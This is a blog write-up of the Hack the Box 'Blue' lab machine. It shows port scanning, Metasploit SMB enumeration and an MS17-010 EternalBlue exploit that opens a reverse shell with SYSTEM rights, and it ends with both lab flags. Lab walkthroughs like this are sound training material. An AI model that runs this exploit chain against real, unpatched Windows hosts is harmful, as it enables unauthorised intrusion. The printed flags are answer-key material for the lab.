18 January 2022

Pentesting Fun Stuff

following the cyber security path…

Blue

Introduction

The name of the server is Blue and it’s my second machine in the line of Hack the Box challenges.
This write-up is not public because of the restrictions given by the HTB team.
As for the machine, the level is easy.

Enumeration

Starting with a portscan.

Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-25 10:31 CEST
Nmap scan report for 10.10.10.40
Host is up (0.042s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=9/25%OT=135%CT=1%CU=30145%PV=Y%DS=2%DC=T%G=Y%TM=59C8BF
OS:C1%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=I%CI=I%TS=7)SEQ(SP=
OS:101%GCD=1%ISR=10B%TI=I%TS=7)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8
OS:NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2
OS:000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q
OS:=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=
OS:AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T
OS:=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=
OS:Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=
OS:G%RUCK=G%RUD=G)IE(R=N)
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1h00m00s, deviation: 0s, median: -1h00m00s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-09-25T08:35:07+01:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2017-09-25 09:35:08
|_  start_date: 2017-09-25 09:12:14
TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   25.85 ms  10.10.14.1
2   114.70 ms 10.10.10.40
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.26 seconds
msf auxiliary(pipe_auditor) > run
[*] 10.10.10.40:445       - Pipes: \netlogon, \lsarpc, \samr, \browser, \atsvc, \epmapper, \eventlog, \InitShutdown, \keysvc, \lsass, \LSM_API_service, \ntsvcs, \plugplay, \protected_storage, \scerpc, \srvsvc, \trkwks, \W32TIME_ALT, \wkssvc
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(pipe_dcerpc_auditor) > run
Login Failed: The server refused our NetBIOS session request
UUID 00000131-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 00000134-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 00000143-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53 1.0 OPEN VIA BROWSER
UUID 18f70770-8e64-11cf-9af1-0020af6e72f4 0.0 OPEN VIA BROWSER
UUID 1ff70682-0a51-30e8-076d-740be8cee98b 1.0 OPEN VIA BROWSER
UUID 2eb08e3e-639f-4fba-97b1-14f878961076 1.0 OPEN VIA BROWSER
UUID 326731e3-c1c0-4a69-ae20-7d9044a4ea5c 1.0 OPEN VIA BROWSER
UUID 378e52b0-c0a9-11cf-822d-00aa0051e40f 1.0 OPEN VIA BROWSER
UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188 3.0 OPEN VIA BROWSER
UUID 63fbe424-2029-11d1-8db8-00aa004abd5e 1.0 OPEN VIA BROWSER
UUID 6bffd098-a112-3610-9833-012892020162 0.0 OPEN VIA BROWSER
UUID 86d35949-83c9-4044-b424-db363231fd0c 1.0 OPEN VIA BROWSER
UUID a398e520-d59a-4bdd-aa7a-3c1e0303a511 1.0 OPEN VIA BROWSER
UUID afa8bd80-7d8a-11c9-bef4-08002b102989 1.0 OPEN VIA BROWSER
UUID c9ac6db5-82b7-4e55-ae8a-e464ed7b4277 1.0 OPEN VIA BROWSER
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_enumusers) > run
[+] 10.10.10.40:445       - HARIS-PC [  ]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_enumshares) > run
[-] 10.10.10.40:139       - Login Failed: The SMB server did not reply to our request
[*] 10.10.10.40:445       - Windows 7 Service Pack 1 (Unknown)
[+] 10.10.10.40:445       - ADMIN$ - (DS) Remote Admin
[+] 10.10.10.40:445       - C$ - (DS) Default share
[+] 10.10.10.40:445       - IPC$ - (I) Remote IPC
[+] 10.10.10.40:445       - Share - (DS)
[+] 10.10.10.40:445       - Users - (DS)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_login) > run
[*] 10.10.10.40:445       - 10.10.10.40:445 - Starting SMB login bruteforce
[-] 10.10.10.40:445       - This system accepts authentication with any credentials, brute force is ineffective.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_lookupsid) > run
[*] 10.10.10.40:445       - PIPE(LSARPC) LOCAL(haris-PC - 5-21-319597671-3711062392-2889596693) DOMAIN(WORKGROUP - )
[*] 10.10.10.40:445       - USER=Administrator RID=500
[*] 10.10.10.40:445       - USER=Guest RID=501
[*] 10.10.10.40:445       - GROUP=None RID=513
[*] 10.10.10.40:445       - USER=haris RID=1000
[*] 10.10.10.40:445       - HARIS-PC [Administrator, Guest, haris ]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-25 11:50 CEST
Nmap scan report for 10.10.10.40
Host is up (0.028s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 2.15 seconds

Exploitation

Enough information gathering. Looks like the system is vulnerable.

msf exploit(ms17_010_eternalblue) > exploit -j
[*] Exploit running as background job 3.
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] 10.10.10.40:445 - Connecting to target for exploitation.
msf exploit(ms17_010_eternalblue) > [+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.40:49158) at 2017-09-25 11:55:18 +0200
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Users\haris\Desktop>type user.txt.txt
type user.txt.txt
4c546aea7dbee75cbd71de245c8deea9

That’s one. No to get the final hash.

C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
ff548eb71e920ff6c08843ce9df4e717

Done.
 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.